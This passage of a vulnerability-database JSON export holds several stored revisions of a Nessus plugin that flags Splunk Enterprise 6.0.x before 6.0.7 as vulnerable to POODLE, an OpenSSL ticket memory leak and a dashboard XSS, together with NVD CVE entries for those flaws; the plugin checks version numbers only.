cross-site scripting flaw exists within the Dashboard\n due to improperly validating input. This allows a\n remote attacker, using a specially crafted request, to\n execute arbitrary script code in the user's browser\n session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.splunk.com/view/SP-CAAANST\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Splunk Enterprise 6.0.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:splunk:splunk\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"splunkd_detect.nasl\",\"splunk_web_detect.nasl\");\n script_require_ports(\"Services/www\", 8089, 8000);\n script_require_keys(\"installed_sw/Splunk\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Splunk\";\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:8000, embedded:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nver = install['version'];\n\ninstall_url = build_url(qs:dir, port:port);\n\n# Affected : 6.0.x < 6.0.7\nif (ver =~ \"^6\\.\" && ver_compare(ver:ver,fix:\"6.0.7\",strict:FALSE) < 0)\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +ver+\n '\\n Fixed version : 6.0.7\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);\n", "title": "Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)", "type": "nessus", "viewCount": 41}, "differentElements": ["references", "modified", "sourceData"], "edition": 5, "lastseen": "2018-09-02T00:00:11"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:splunk:splunk"], "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-5466"], "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "description": "According to its version number, the Splunk Enterprise hosted on the remote web server is 6.0.x prior to 6.0.7. It is, therefore, affected by the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure vulnerability, known as POODLE, exists due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to handling session tickets that have not been properly verified for integrity. A remote attacker, by using a large number of invalid session tickets, can exploit this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard due to improperly validating input. This allows a remote attacker, using a specially crafted request, to execute arbitrary script code in the user's browser session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "f0d18187296d718314f68012f5ef0ffcb24d42dce7471cb9e20c8d626ccbda73", "hashmap": [{"hash": "8ee5ec7e3dbbe87c523c0cd91e4c48ec", "key": "cvelist"}, {"hash": "c4d155f2fb5bf679bbf0c9e946c335a9", "key": "pluginID"}, {"hash": "3b33040e1ee70c0673ab567f99a67d3f", "key": "modified"}, {"hash": "bf85ac661e90f76efc3e3b625164c738", "key": "cvss"}, {"hash": "1d36f533639d3922864e792e229da60d", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8f041c0fcda52146c962a2af67d7c713", "key": "cpe"}, {"hash": "96b871079f24288bf32a59eb920d6ad4", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1733151b4856719fe7e98a26d6fa0f38", "key": "href"}, {"hash": "3f4e1c2fc418f5abbca00df2677c178c", "key": "references"}, {"hash": "0e449fd9289d8f4e11f313fe030324e3", "key": "description"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "ecb1793a25109af820fda53b11964ff5", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=79723", "id": "SPLUNK_607.NASL", "lastseen": "2018-07-31T10:13:02", "modified": "2018-07-30T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "79723", "published": "2014-12-04T00:00:00", "references": ["https://www.openssl.org/~bodo/ssl-poodle.pdf", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.imperialviolet.org/2014/10/14/poodle.html", "http://www.splunk.com/view/SP-CAAANST"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79723);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/07/30 15:31:31\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-3567\", \"CVE-2014-5466\");\n script_bugtraq_id(70574, 70586, 71257);\n script_xref(name:\"CERT\", value:\"577193\");\n\n script_name(english:\"Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)\");\n script_summary(english:\"Checks the version of Splunk Enterprise.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the Splunk Enterprise hosted on the\nremote web server is 6.0.x prior to 6.0.7. It is, therefore, affected\nby the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability, known as POODLE, exists due to the way\n SSL 3.0 handles padding bytes when decrypting messages\n encrypted using block ciphers in cipher block chaining\n (CBC) mode. A MitM attacker can decrypt a selected byte\n of a cipher text in as few as 256 tries if they are able\n to force a victim application to repeatedly send the\n same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to\n handling session tickets that have not been properly\n verified for integrity. A remote attacker, by using a\n large number of invalid session tickets, can exploit\n this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard\n due to improperly validating input. This allows a\n remote attacker, using a specially crafted request, to\n execute arbitrary script code in the user's browser\n session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.splunk.com/view/SP-CAAANST\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Splunk Enterprise 6.0.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:splunk:splunk\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"splunkd_detect.nasl\",\"splunk_web_detect.nasl\");\n script_require_ports(\"Services/www\", 8089, 8000);\n script_require_keys(\"installed_sw/Splunk\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Splunk\";\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:8000, embedded:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nver = install['version'];\n\ninstall_url = build_url(qs:dir, port:port);\n\n# Affected : 6.0.x < 6.0.7\nif (ver =~ \"^6\\.\" && ver_compare(ver:ver,fix:\"6.0.7\",strict:FALSE) < 0)\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +ver+\n '\\n Fixed version : 6.0.7\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);\n", "title": "Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)", "type": "nessus", "viewCount": 37}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-07-31T10:13:02"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:splunk:splunk"], "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-5466"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "According to its version number, the Splunk Enterprise hosted on the remote web server is 6.0.x prior to 6.0.7. It is, therefore, affected by the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure vulnerability, known as POODLE, exists due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to handling session tickets that have not been properly verified for integrity. A remote attacker, by using a large number of invalid session tickets, can exploit this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard due to improperly validating input. This allows a remote attacker, using a specially crafted request, to execute arbitrary script code in the user's browser session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "137a95cd14a75b85b3b19532a17ce18fad4d1384eab06712aa8effc5225b7364", "hashmap": [{"hash": "8ee5ec7e3dbbe87c523c0cd91e4c48ec", "key": "cvelist"}, {"hash": "c4d155f2fb5bf679bbf0c9e946c335a9", "key": "pluginID"}, {"hash": "3b33040e1ee70c0673ab567f99a67d3f", "key": "modified"}, {"hash": "1d36f533639d3922864e792e229da60d", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8f041c0fcda52146c962a2af67d7c713", "key": "cpe"}, {"hash": "96b871079f24288bf32a59eb920d6ad4", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1733151b4856719fe7e98a26d6fa0f38", "key": "href"}, {"hash": "3f4e1c2fc418f5abbca00df2677c178c", "key": "references"}, {"hash": "0e449fd9289d8f4e11f313fe030324e3", "key": "description"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "ecb1793a25109af820fda53b11964ff5", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=79723", "id": "SPLUNK_607.NASL", "lastseen": "2018-08-30T19:51:57", "modified": "2018-07-30T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "79723", "published": "2014-12-04T00:00:00", "references": ["https://www.openssl.org/~bodo/ssl-poodle.pdf", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.imperialviolet.org/2014/10/14/poodle.html", "http://www.splunk.com/view/SP-CAAANST"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79723);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/07/30 15:31:31\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-3567\", \"CVE-2014-5466\");\n script_bugtraq_id(70574, 70586, 71257);\n script_xref(name:\"CERT\", value:\"577193\");\n\n script_name(english:\"Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)\");\n script_summary(english:\"Checks the version of Splunk Enterprise.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the Splunk Enterprise hosted on the\nremote web server is 6.0.x prior to 6.0.7. It is, therefore, affected\nby the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability, known as POODLE, exists due to the way\n SSL 3.0 handles padding bytes when decrypting messages\n encrypted using block ciphers in cipher block chaining\n (CBC) mode. A MitM attacker can decrypt a selected byte\n of a cipher text in as few as 256 tries if they are able\n to force a victim application to repeatedly send the\n same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to\n handling session tickets that have not been properly\n verified for integrity. A remote attacker, by using a\n large number of invalid session tickets, can exploit\n this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard\n due to improperly validating input. This allows a\n remote attacker, using a specially crafted request, to\n execute arbitrary script code in the user's browser\n session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.splunk.com/view/SP-CAAANST\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Splunk Enterprise 6.0.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:splunk:splunk\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"splunkd_detect.nasl\",\"splunk_web_detect.nasl\");\n script_require_ports(\"Services/www\", 8089, 8000);\n script_require_keys(\"installed_sw/Splunk\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Splunk\";\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:8000, embedded:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nver = install['version'];\n\ninstall_url = build_url(qs:dir, port:port);\n\n# Affected : 6.0.x < 6.0.7\nif (ver =~ \"^6\\.\" && ver_compare(ver:ver,fix:\"6.0.7\",strict:FALSE) < 0)\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +ver+\n '\\n Fixed version : 6.0.7\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);\n", "title": "Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)", "type": "nessus", "viewCount": 37}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:51:57"}], "edition": 7, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "8f041c0fcda52146c962a2af67d7c713"}, {"key": "cvelist", "hash": "8ee5ec7e3dbbe87c523c0cd91e4c48ec"}, {"key": "cvss", "hash": "bf85ac661e90f76efc3e3b625164c738"}, {"key": "description", "hash": "e29d8deda23fbe5502912168b17a22cd"}, {"key": "href", "hash": "1733151b4856719fe7e98a26d6fa0f38"}, {"key": "modified", "hash": "015cb78ce50d3bd4e2fbe18f25603329"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "c4d155f2fb5bf679bbf0c9e946c335a9"}, {"key": "published", "hash": "ecb1793a25109af820fda53b11964ff5"}, {"key": "references", "hash": "dfc7149444808a0f1dc6e0cd2852dab6"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "f66544bdb93645ad0d9c3861d28d686d"}, {"key": "title", "hash": "1d36f533639d3922864e792e229da60d"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "69903ddd1b96b7927b1606ada5da36673ae0b57f2943746588ff6f39b020ca60", "viewCount": 45, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79723);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-3567\", \"CVE-2014-5466\");\n script_bugtraq_id(70574, 70586, 71257);\n script_xref(name:\"CERT\", value:\"577193\");\n\n script_name(english:\"Splunk Enterprise 6.0.x < 6.0.7 Multiple Vulnerabilities (POODLE)\");\n script_summary(english:\"Checks the version of Splunk Enterprise.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the Splunk Enterprise hosted on the\nremote web server is 6.0.x prior to 6.0.7. It is, therefore, affected\nby the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability, known as POODLE, exists due to the way\n SSL 3.0 handles padding bytes when decrypting messages\n encrypted using block ciphers in cipher block chaining\n (CBC) mode. A MitM attacker can decrypt a selected byte\n of a cipher text in as few as 256 tries if they are able\n to force a victim application to repeatedly send the\n same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to\n handling session tickets that have not been properly\n verified for integrity. A remote attacker, by using a\n large number of invalid session tickets, can exploit\n this to cause a denial of service. (CVE-2014-3567)\n\n - A cross-site scripting flaw exists within the Dashboard\n due to improperly validating input. This allows a\n remote attacker, using a specially crafted request, to\n execute arbitrary script code in the user's browser\n session within the trust relationship. (CVE-2014-5466)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.splunk.com/view/SP-CAAANST\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Splunk Enterprise 6.0.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:splunk:splunk\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"splunkd_detect.nasl\",\"splunk_web_detect.nasl\");\n script_require_ports(\"Services/www\", 8089, 8000);\n script_require_keys(\"installed_sw/Splunk\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Splunk\";\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:8000, embedded:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nver = install['version'];\n\ninstall_url = build_url(qs:dir, port:port);\n\n# Affected : 6.0.x < 6.0.7\nif (ver =~ \"^6\\.\" && ver_compare(ver:ver,fix:\"6.0.7\",strict:FALSE) < 0)\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +ver+\n '\\n Fixed version : 6.0.7\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);\n", "naslFamily": "CGI abuses", "pluginID": "79723", "cpe": ["cpe:/a:splunk:splunk"]}

{"cve": [{"lastseen": "2016-09-03T20:50:58", "references": ["http://www.splunk.com/view/SP-CAAANST"], "edition": 1, "description": "Cross-site scripting (XSS) vulnerability in the Dashboard in Splunk Web in Splunk Enterprise 6.1.x before 6.1.4, 6.0.x before 6.0.7, and 5.0.x before 5.0.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", "reporter": "NVD", "published": "2014-12-16T13:59:05", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "CVE-2014-5466", "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-5466"], "scanner": [], "modified": "2014-12-17T14:31:00", "cpe": ["cpe:/a:splunk:splunk:5.0.8", "cpe:/a:splunk:splunk:6.0.6", "cpe:/a:splunk:splunk:5.0", "cpe:/a:splunk:splunk:6.1.3", "cpe:/a:splunk:splunk:6.0.3", "cpe:/a:splunk:splunk:6.0.2", "cpe:/a:splunk:splunk:5.0.9", "cpe:/a:splunk:splunk:6.0", "cpe:/a:splunk:splunk:6.0.5", "cpe:/a:splunk:splunk:5.0.5", "cpe:/a:splunk:splunk:6.0.4", "cpe:/a:splunk:splunk:5.0.4", "cpe:/a:splunk:splunk:6.1.2", "cpe:/a:splunk:splunk:5.0.1", "cpe:/a:splunk:splunk:5.0.3", "cpe:/a:splunk:splunk:6.1", "cpe:/a:splunk:splunk:6.0.1", "cpe:/a:splunk:splunk:5.0.2", "cpe:/a:splunk:splunk:5.0.6", "cpe:/a:splunk:splunk:6.1.4", "cpe:/a:splunk:splunk:5.0.7", "cpe:/a:splunk:splunk:6.1.1"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5466", "id": "CVE-2014-5466", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-15T11:55:25", "references": ["http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00003.html", "https://support.citrix.com/article/CTX216642", "http://www.securitytracker.com/id/1031052", "https://support.apple.com/HT205217", "http://marc.info/?l=bugtraq&m=143290583027876&w=2", "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_openssl6", "http://www.debian.org/security/2014/dsa-3053", "http://marc.info/?l=bugtraq&m=141477196830952&w=2", "https://www.openssl.org/news/secadv_20141015.txt", "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=7fd4ce6a997be5f5c9e744ac527725c2850de203", "http://marc.info/?l=bugtraq&m=142791032306609&w=2", "http://lists.apple.com/archives/security-announce/2015/Jan/msg00003.html", "http://security.gentoo.org/glsa/glsa-201412-39.xml", "http://marc.info/?l=bugtraq&m=142103967620673&w=2", "http://marc.info/?l=bugtraq&m=143290437727362&w=2", "http://lists.apple.com/archives/security-announce/2015/Sep/msg00002.html", "http://marc.info/?l=bugtraq&m=143290522027658&w=2", "http://advisories.mageia.org/MGASA-2014-0416.html", "http://marc.info/?l=bugtraq&m=142834685803386&w=2", "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05150888", "http://support.apple.com/HT204244", "http://www.ubuntu.com/usn/USN-2385-1", "http://rhn.redhat.com/errata/RHSA-2015-0126.html", "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00001.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2014:203", "http://www-01.ibm.com/support/docview.wss?uid=swg21686997", "http://marc.info/?l=bugtraq&m=142118135300698&w=2", "http://rhn.redhat.com/errata/RHSA-2014-1692.html", "ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2014-015.txt.asc", "http://marc.info/?l=bugtraq&m=142495837901899&w=2", "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc", "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html", "http://www.securityfocus.com/bid/70586", "http://www.splunk.com/view/SP-CAAANST", "http://marc.info/?l=bugtraq&m=142624590206005&w=2", "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00008.html", "http://rhn.redhat.com/errata/RHSA-2014-1652.html", "http://marc.info/?l=bugtraq&m=142804214608580&w=2", "http://www.mandriva.com/security/advisories?name=MDVSA-2015:062", "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05158380", "https://kc.mcafee.com/corporate/index?page=content&id=SB10091"], "edition": 3, "description": "Memory leak in the tls_decrypt_ticket function in t1_lib.c in OpenSSL before 0.9.8zc, 1.0.0 before 1.0.0o, and 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted session ticket that triggers an integrity-check failure.", "reporter": "NVD", "published": "2014-10-18T21:55:13", "title": "CVE-2014-3567", "type": "cve", "enchantments": {"score": {"vector": 